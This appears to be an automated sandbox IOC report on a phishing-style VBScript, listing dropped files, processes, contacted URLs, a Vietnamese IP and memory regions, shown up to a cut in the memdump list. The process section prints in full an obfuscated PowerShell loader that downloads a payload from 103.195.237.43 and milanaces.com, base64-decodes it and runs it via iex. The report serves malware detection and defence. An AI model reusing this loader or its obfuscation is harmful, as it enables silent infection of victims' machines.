IOC Report
Urgent_File_Confirmation_00000000000000000000.vbs

loading gif

Files

File Path
Type
Category
Malicious
Urgent_File_Confirmation_00000000000000000000.vbs
ASCII text, with very long lines (2211), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25dnuflu.ci0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lykckzwr.vzf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzvscs4r.jtf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z531fgvl.vw2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Paraphysiferous.Mak
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent_File_Confirmation_00000000000000000000.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.] =,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$ gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209 (Nordvest61 'B$Bg l,oFbAa.l :Ma nNi slu r i a,=A$Mt r u,e ') ;Diagonalgade209 $Packplane223;Diagonalgade209 (Nordvest61 ' SPt,aGrEtP- SSl e eTp. 4 ');Diagonalgade209 (Nordvest61 ' $Kg.l o b a,l : k lTa,p s.a lSv,e nN=g(,TBeAs tC-,PFa t hP E$EH y.pBn o tuiFsSeArTe s )S ') ;Diagonalgade209 (Nordvest61 'S$ g,l,oLbFa lM:AS hLrDi m pci.shhS= $Cg,lTo,b a,l :,V v ePsSt,o l.+C+.%A$Kb yTrUe n dTeRrVn,eAsA.Sc oLu,n,t ') ;$Ristornos33=$byrendernes[$Shrimpish];}$Tedeummers=367459;$Formningernes=26860;Diagonalgade209 (Nordvest61 ' $sg l oTbUaOlE:TDKiBsTp.aIt.cBhP = SGAeBt - C,oGn t e n,tF O$.HPy p n,o tIiMs eMr.eKsQ ');Diagonalgade209 (Nordvest61 'P$Dg.l o,bBaGl,:,P aPl,a.ettAiBoTl oNgKiBcRa,l R=E C[WSByUsFt e m . C o,nSv e,rMt,].:E: FVr o mBBKaTsReB6C4 S t r.i.n.gP(F$sDPi sTpBa tMcShS), ');Diagonalgade209 (Nordvest61 'L$.g lFo b a l :BT,o.n i cta,lK =K [,STyFs,t e m .STMe x ta. E n.c,o dEi nVg.] :S: AAS.CGIII .EGPe t,S tTr.i,nPgF(B$KPPa lIa eLt i o lbo g i c a lc) ');Diagonalgade209 (Nordvest61 ' $GgAlEoMbAaTl :SKOaLnCdBiSd tSw r.=c$MTDoUnSiUc a lS.,s,u,b sHt.r iTn gO(S$,TEe dDeRuNm mSePr.sS, $.FAo,rAmanLi nFgVeAr n,eUsG) ');Diagonalgade209 $Kandidtwr;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.] =,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$ gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209 (Nordvest61 'B$Bg l,oFbAa.l :Ma nNi slu r i a,=A$Mt r u,e ') ;Diagonalgade209 $Packplane223;Diagonalgade209 (Nordvest61 ' SPt,aGrEtP- SSl e eTp. 4 ');Diagonalgade209 (Nordvest61 ' $Kg.l o b a,l : k lTa,p s.a lSv,e nN=g(,TBeAs tC-,PFa t hP E$EH y.pBn o tuiFsSeArTe s )S ') ;Diagonalgade209 (Nordvest61 'S$ g,l,oLbFa lM:AS hLrDi m pci.shhS= $Cg,lTo,b a,l :,V v ePsSt,o l.+C+.%A$Kb yTrUe n dTeRrVn,eAsA.Sc oLu,n,t ') ;$Ristornos33=$byrendernes[$Shrimpish];}$Tedeummers=367459;$Formningernes=26860;Diagonalgade209 (Nordvest61 ' $sg l oTbUaOlE:TDKiBsTp.aIt.cBhP = SGAeBt - C,oGn t e n,tF O$.HPy p n,o tIiMs eMr.eKsQ ');Diagonalgade209 (Nordvest61 'P$Dg.l o,bBaGl,:,P aPl,a.ettAiBoTl oNgKiBcRa,l R=E C[WSByUsFt e m . C o,nSv e,rMt,].:E: FVr o mBBKaTsReB6C4 S t r.i.n.gP(F$sDPi sTpBa tMcShS), ');Diagonalgade209 (Nordvest61 'L$.g lFo b a l :BT,o.n i cta,lK =K [,STyFs,t e m .STMe x ta. E n.c,o dEi nVg.] :S: AAS.CGIII .EGPe t,S tTr.i,nPgF(B$KPPa lIa eLt i o lbo g i c a lc) ');Diagonalgade209 (Nordvest61 ' $GgAlEoMbAaTl :SKOaLnCdBiSd tSw r.=c$MTDoUnSiUc a lS.,s,u,b sHt.r iTn gO(S$,TEe dDeRuNm mSePr.sS, $.FAo,rAmanLi nFgVeAr n,eUsG) ');Diagonalgade209 $Kandidtwr;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paraphysiferous.Mak && echo t"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paraphysiferous.Mak && echo t"

URLs

Name
IP
Malicious
http://103.195.237.43/Magnetis
unknown
http://103.19
unknown
https://milanaces.com/Magnetiseringerne.sea0
unknown
http://103.195.237.43/Magnetiseringern
unknown
http://103.195.
unknown
http://103.195.237.43/Magnetiseringerne.s
unknown
https://milanaces.c
unknown
https://contoso.com/License
unknown
https://milanaces.co
unknown
http://103.195.237.43/Magnetiseringerne.sea
103.195.237.43
https://milanaces.com/Magnetiseringerne.sea
unknown
http://103.195.237.43/Magnetiseringerne.se
unknown
http://103.195.237.4
unknown
http://103.195H
unknown
http://103.195.237.43/Magnetiserin
unknown
https://milanaces.com/Magnetiseringern
unknown
http://103.195.237.43/Magnetiseri
unknown
https://milanaces.com
unknown
https://milanaces.com/Magneti
unknown
http://103.1
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://103.195
unknown
https://milanaces.com/Magnetiseringe
unknown
http://103.195.237.
unknown
https://milanaces.com/Magnet
unknown
https://milanaces.com/Magnetiseringer
unknown
http://103.195.237.43
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://103.195.237.43/Magneti
unknown
http://103.195.237.43/Magn
unknown
http://103.195.237.43/Magnet
unknown
http://nuget.org/NuGet.exe
unknown
http://103.195.237.43/Magnetiseringer
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/Icon
unknown
https://milanaces.com/Ma
unknown
https://milanaces.com/Magnetis
unknown
http://103.195.237
unknown
https://milanaces.com/Magnetiseringerne.
unknown
https://milanaces.com/Mag
unknown
https://milanaces.com/Magnetiseringerne.se
unknown
http://103.195.237.43/Mag
unknown
http://103.195.237.43/M
unknown
http://103.195.237.43/Magne
unknown
https://github.com/Pester/Pester
unknown
http://103.195.237.43/Magnetiseringerne.
unknown
http://103.195.23
unknown
https://milanaces.com/Magnetise
unknown
https://milanaces.com/Magnetiseringerne
unknown
https://milanaces.com/Magnetiseringerne.s
unknown
https://milanaces.com/Magnetiser
unknown
http://103.195.237.43/Ma
unknown
https://milanaces.com/
unknown
https://milanaces.com/Magne
unknown
https://milanaces.com/Magnetiserin
unknown
https://aka.ms/pscore6lBdq
unknown
http://103.195.237.43/Magnetisering
unknown
http://103.195.2
unknown
https://milanaces.com/M
unknown
http://103.195.237.43/
unknown
https://aka.ms/pscore68
unknown
https://milanaces.com/Magn
unknown
http://103.195.237.43/Magnetiser
unknown
http://103.195.237.43/Magnetise
unknown
http://103.195.237.43/Magnetiseringerne
unknown
http://103.195.237.43/Magnetiseringe
unknown
https://milanaces.com/Magnetiseri
unknown
https://milanaces.com/Magnetisering
unknown
https://milanaces.com/Magnetiseringerne.seaX
unknown
There are 62 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
103.195.237.43
unknown
Viet Nam

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
9B15000
direct allocation
page execute and read and write
malicious
7FFD9B950000
trusted library allocation
page read and write
190BA0BF000
heap
page read and write
ADF06FE000
stack
page read and write
259D000
stack
page read and write
7710000
trusted library allocation
page read and write
21E80083000
trusted library allocation
page read and write
763E000
stack
page read and write
2DC0000
heap
page read and write
7FFD9B752000
trusted library allocation
page read and write
7075000
heap
page read and write
190BA0A5000
heap
page read and write
499E000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
2D70000
heap
page read and write
7530000
trusted library allocation
page read and write
190BA0F7000
heap
page read and write
8ABB2FB000
stack
page read and write
190BA0D4000
heap
page read and write
82A0000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
E6E92FF000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7410000
heap
page read and write
856D000
heap
page read and write
7429000
heap
page read and write
8380000
trusted library allocation
page read and write
7FFD9B800000
trusted library allocation
page read and write
21EF2477000
heap
page execute and read and write
190B9F64000
heap
page read and write
190BA0A5000
heap
page read and write
2F3A000
trusted library allocation
page execute and read and write
853B000
heap
page read and write
21EF05D0000
heap
page read and write
190B81F3000
heap
page read and write
75FE000
stack
page read and write
7080000
heap
page read and write
190BA138000
heap
page read and write
190BA0D4000
heap
page read and write
21E8080C000
trusted library allocation
page read and write
190BA1B1000
heap
page read and write
29F0000
heap
page read and write
21E90001000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
190B8358000
heap
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
190BA0BF000
heap
page read and write
850A000
heap
page read and write
190BA087000
heap
page read and write
190B81BF000
heap
page read and write
8280000
trusted library allocation
page execute and read and write
190B9F80000
heap
page read and write
8FA0000
direct allocation
page execute and read and write
190BA1DD000
heap
page read and write
21E818AF000
trusted library allocation
page read and write
190BA1D7000
heap
page read and write
2A5E000
stack
page read and write
ADF01FD000
stack
page read and write
21EF2690000
heap
page read and write
21EF066F000
heap
page read and write
7520000
trusted library allocation
page read and write
21EF1EE0000
heap
page readonly
190B81F2000
heap
page read and write
8ABAFFF000
stack
page read and write
190BA1DC000
heap
page read and write
190BA08B000
heap
page read and write
75B8000
trusted library allocation
page read and write
190BA264000
heap
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
822D000
stack
page read and write
87B0000
trusted library allocation
page read and write
B915000
direct allocation
page execute and read and write
190B9F61000
heap
page read and write
21EF05C5000
heap
page read and write
21EF066D000
heap
page read and write
190B821F000
heap
page read and write
2A70000
heap
page read and write
190BA20A000
heap
page read and write
7DF3FFB90000
trusted library allocation
page execute and read and write
21EF06B1000
heap
page read and write
8187000
stack
page read and write
21EF2781000
heap
page read and write
8325000
trusted library allocation
page read and write
7090000
heap
page read and write
190B81CD000
heap
page read and write
190B81E5000
heap
page read and write
21E8127F000
trusted library allocation
page read and write
190BA0D4000
heap
page read and write
190B8358000
heap
page read and write
21EF2670000
heap
page read and write
190B8213000
heap
page read and write
7488000
heap
page read and write
2F30000
trusted library allocation
page read and write
29A0000
heap
page read and write
190B822B000
heap
page read and write
190B8100000
heap
page read and write
7FFD9B754000
trusted library allocation
page read and write
190BA20B000
heap
page read and write
190BA071000
heap
page read and write
8710000
trusted library allocation
page read and write
190BA22F000
heap
page read and write
21EF1EF0000
trusted library allocation
page read and write
8390000
heap
page read and write
2335C230000
heap
page read and write
190B81BD000
heap
page read and write
190B9F87000
heap
page read and write
8ABACFF000
stack
page read and write
190B8130000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
8ABA6F9000
stack
page read and write
190BA0DA000
heap
page read and write
6D9F000
stack
page read and write
190B8213000
heap
page read and write
2F00000
trusted library allocation
page read and write
8370000
trusted library allocation
page execute and read and write
190BA0C6000
heap
page read and write
ADF037E000
stack
page read and write
21EF0683000
heap
page read and write
21EF27A7000
heap
page read and write
190B81D5000
heap
page read and write
190B835C000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
190B820E000
heap
page read and write
4B75000
trusted library allocation
page read and write
8ABA8FE000
stack
page read and write
2E9F000
heap
page read and write
21E902EF000
trusted library allocation
page read and write
190B81CA000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
ADF067E000
stack
page read and write
190B8157000
heap
page read and write
826F000
stack
page read and write
76C0000
trusted library allocation
page read and write
190BA0F7000
heap
page read and write
190BA0D4000
heap
page read and write
2F80000
heap
page read and write
21EF0610000
trusted library allocation
page read and write
190B9F89000
heap
page read and write
8ABB0FF000
stack
page read and write
2DB0000
heap
page read and write
190B9F60000
heap
page read and write
190B9FA6000
heap
page read and write
21EF24D3000
heap
page read and write
7F2F0000
trusted library allocation
page execute and read and write
190BA1C5000
heap
page read and write
190B9F67000
heap
page read and write
190B81BF000
heap
page read and write
21EF1FEA000
heap
page read and write
190B9F72000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
2900000
heap
page read and write
190B9F61000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
E6E90FD000
stack
page read and write
190B9FA5000
heap
page read and write
2F10000
trusted library allocation
page read and write
190B81FC000
heap
page read and write
847B000
stack
page read and write
AF15000
direct allocation
page execute and read and write
190B80D0000
heap
page read and write
21E81DDD000
trusted library allocation
page read and write
4790000
heap
page read and write
7FFD9B932000
trusted library allocation
page read and write
190B8355000
heap
page read and write
2F70000
heap
page readonly
ADF07FC000
stack
page read and write
190B821C000
heap
page read and write
9115000
direct allocation
page execute and read and write
7FFD9BAC0000
trusted library allocation
page read and write
7FFD9B76B000
trusted library allocation
page read and write
190BA0DA000
heap
page read and write
190BA1DE000
heap
page read and write
190B81E5000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
8720000
trusted library allocation
page read and write
190B9F6F000
heap
page read and write
190BA266000
heap
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
190BA08B000
heap
page read and write
852F000
heap
page read and write
190B815E000
heap
page read and write
767E000
stack
page read and write
190BA0DA000
heap
page read and write
2F40000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
757D000
trusted library allocation
page read and write
8190000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
190BA1B3000
heap
page read and write
21EF071C000
heap
page read and write
21EF27CF000
heap
page read and write
190BA098000
heap
page read and write
21EF24D5000
heap
page read and write
190BA0F7000
heap
page read and write
21EF2580000
heap
page read and write
2F8B000
heap
page read and write
2F14000
trusted library allocation
page read and write
2F45000
trusted library allocation
page execute and read and write
7510000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
190B815A000
heap
page read and write
190B9F6F000
heap
page read and write
190BA086000
heap
page read and write
190B8159000
heap
page read and write
190B9F74000
heap
page read and write
2F13000
trusted library allocation
page execute and read and write
75B0000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
28EC000
stack
page read and write
190BA0BF000
heap
page read and write
190B835D000
heap
page read and write
21E80668000
trusted library allocation
page read and write
4A0E000
stack
page read and write
21EF2584000
heap
page read and write
190B80E0000
heap
page read and write
4778000
trusted library allocation
page read and write
8ABA9FE000
stack
page read and write
190BA0C2000
heap
page read and write
6E70000
direct allocation
page read and write
ADEFD23000
stack
page read and write
8580000
heap
page read and write
7700000
trusted library allocation
page read and write
2335C067000
heap
page read and write
A515000
direct allocation
page execute and read and write
190B819B000
heap
page read and write
190BA1CC000
heap
page read and write
190BA0F3000
heap
page read and write
190B81FD000
heap
page read and write
190BA10B000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
2E6F000
heap
page read and write
190B822D000
heap
page read and write
190BA1B0000
heap
page read and write
7770000
trusted library allocation
page read and write
76BD000
stack
page read and write
836C000
stack
page read and write
190B81F3000
heap
page read and write
190BA0A5000
heap
page read and write
190B835E000
heap
page read and write
21E81EDF000
trusted library allocation
page read and write
190B81F4000
heap
page read and write
75A0000
heap
page execute and read and write
190B9F89000
heap
page read and write
21EF0662000
heap
page read and write
190B8213000
heap
page read and write
7730000
trusted library allocation
page read and write
190B8213000
heap
page read and write
2E31000
heap
page read and write
2F29000
trusted library allocation
page read and write
190B817B000
heap
page read and write
2D7F000
stack
page read and write
2A60000
heap
page read and write
481C000
stack
page read and write
2B8C000
heap
page read and write
495E000
stack
page read and write
21EF2640000
heap
page execute and read and write
CD15000
direct allocation
page execute and read and write
190B9F6A000
heap
page read and write
190B8158000
heap
page read and write
2F42000
trusted library allocation
page read and write
190B9F61000
heap
page read and write
21E80001000
trusted library allocation
page read and write
190BA190000
remote allocation
page read and write
21E80507000
trusted library allocation
page read and write
21EF05C0000
heap
page read and write
21EF2463000
trusted library allocation
page read and write
7580000
trusted library allocation
page read and write
190BA0A5000
heap
page read and write
7740000
trusted library allocation
page read and write
7477000
heap
page read and write
5A8C000
trusted library allocation
page read and write
190B9F6F000
heap
page read and write
2D77000
heap
page read and write
7070000
heap
page read and write
2E0B000
heap
page read and write
74EE000
heap
page read and write
21EF2470000
heap
page execute and read and write
21E902FD000
trusted library allocation
page read and write
190B9F61000
heap
page read and write
190B821F000
heap
page read and write
21EF1F20000
trusted library allocation
page read and write
5A49000
trusted library allocation
page read and write
2335C355000
heap
page read and write
190BA0E7000
heap
page read and write
5CD5000
trusted library allocation
page read and write
748B000
heap
page read and write
4860000
heap
page read and write
8ABA7FE000
stack
page read and write
190BA264000
heap
page read and write
D715000
direct allocation
page execute and read and write
7467000
heap
page read and write
ADF077E000
stack
page read and write
190BA099000
heap
page read and write
190BA0DA000
heap
page read and write
8290000
trusted library allocation
page read and write
21E81DD6000
trusted library allocation
page read and write
190B9F89000
heap
page read and write
190BA0FA000
heap
page read and write
21EF0580000
heap
page read and write
190BA0F6000
heap
page read and write
476E000
stack
page read and write
190B81BD000
heap
page read and write
190B9F65000
heap
page read and write
7760000
trusted library allocation
page read and write
21EF0620000
heap
page read and write
2335C020000
heap
page read and write
C315000
direct allocation
page execute and read and write
21E81DF1000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
190BA0DA000
heap
page read and write
190BA190000
remote allocation
page read and write
21E902CF000
trusted library allocation
page read and write
190BA0D4000
heap
page read and write
190BA0BF000
heap
page read and write
21EF1ED0000
trusted library allocation
page read and write
21EF25C8000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
190BA0BF000
heap
page read and write
190B822B000
heap
page read and write
21EF258E000
heap
page read and write
190BA0E7000
heap
page read and write
5CD0000
trusted library allocation
page read and write
2E9A000
heap
page read and write
2B7E000
unkown
page read and write
190B9F61000
heap
page read and write
21EF0480000
heap
page read and write
190BA096000
heap
page read and write
190BA0CF000
heap
page read and write
72FE000
stack
page read and write
7790000
trusted library allocation
page read and write
21E807F6000
trusted library allocation
page read and write
21EF1FD5000
heap
page read and write
190B9F83000
heap
page read and write
E6E91FF000
unkown
page read and write
190B8210000
heap
page read and write
4880000
trusted library allocation
page read and write
4870000
trusted library allocation
page execute and read and write
21E80802000
trusted library allocation
page read and write
4868000
heap
page read and write
2335C06D000
heap
page read and write
491E000
stack
page read and write
2335C000000
heap
page read and write
21EF2525000
heap
page read and write
77FB000
stack
page read and write
190B8142000
heap
page read and write
2E78000
heap
page read and write
190B9F89000
heap
page read and write
190B9F89000
heap
page read and write
ADF017E000
stack
page read and write
21EF0665000
heap
page read and write
21EF25B3000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
21EF251D000
heap
page read and write
47DF000
stack
page read and write
21EF0669000
heap
page read and write
8270000
heap
page read and write
190B9F89000
heap
page read and write
81A0000
trusted library allocation
page execute and read and write
48DE000
stack
page read and write
21EF1F60000
trusted library allocation
page read and write
190B9F89000
heap
page read and write
21EF0660000
heap
page read and write
5A21000
trusted library allocation
page read and write
190BA1CD000
heap
page read and write
21EF2AA0000
heap
page read and write
190BA0DA000
heap
page read and write
2E3E000
